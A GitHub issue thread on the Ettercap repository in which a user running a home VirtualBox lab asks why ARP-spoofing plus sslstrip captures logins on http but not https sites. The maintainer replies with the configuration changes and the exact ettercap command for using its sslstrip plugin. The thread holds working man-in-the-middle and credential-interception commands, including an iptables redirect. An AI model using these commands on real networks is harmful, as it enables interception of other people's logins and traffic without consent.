### ISSUE TITLE
@$@$@$@$@$@$@

### ISSUE THREAD

**Issue by parth1234ne** [Ettercap/ettercap#1119]

**Comment by parth1234ne** [comment]
Hello Mr. Koeppea,
I was actually having a little difficult time running ettercap on older
version Kali Linux (2019). The version of ettercap is 0.8.3 but the newer
version is 0.8.3.1.

I used the command (without sslstrip running in the background) -:

***@***.***> ettercap -Tq -M arp:remote -i eth0 /gateway// /target ip//

It works like a magic for http sites

(My target machine is Win8 running on virtualbox latest version and my Kali
machine is also running on virtualbox. Both of them are in the same NAT
NETWORK.)

Now for https sites I run ssltrip with my iptables rule in the backfround
and run ettercap to strip down ssl of https sites.
The commands I used were

in the first terminal window

***@***.***> iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j
REDIRECT --to-port 10000

in the same terminal

***@***.***> sslstrip


Now in the third terminal window I ran

***@***.***> ettercap -Tq -M arp:remote -i eth0 -S /gateway// /target ip//

But nothing happens if I go to https sites.... nothing is printed when I
login to https sites....

**Comment by koeppea** [comment]
You'd not use the external binary sslstrip in parallel to Ettercap, but 
the sslstrip plugin of Ettercap.

First you have to uncomment the redir_command_on and redir_command_off 
lines for Linux (iptables) in the etter.conf.

Then you've to set the ec_euid and ec_guid to 0.

Then save the etter.conf file and start ettercap in the following way:

`ettercap -Tq -Marp:remote -ieth0 -P sslstrip  /gateway// /target//`

This should achieve what you're looking for.
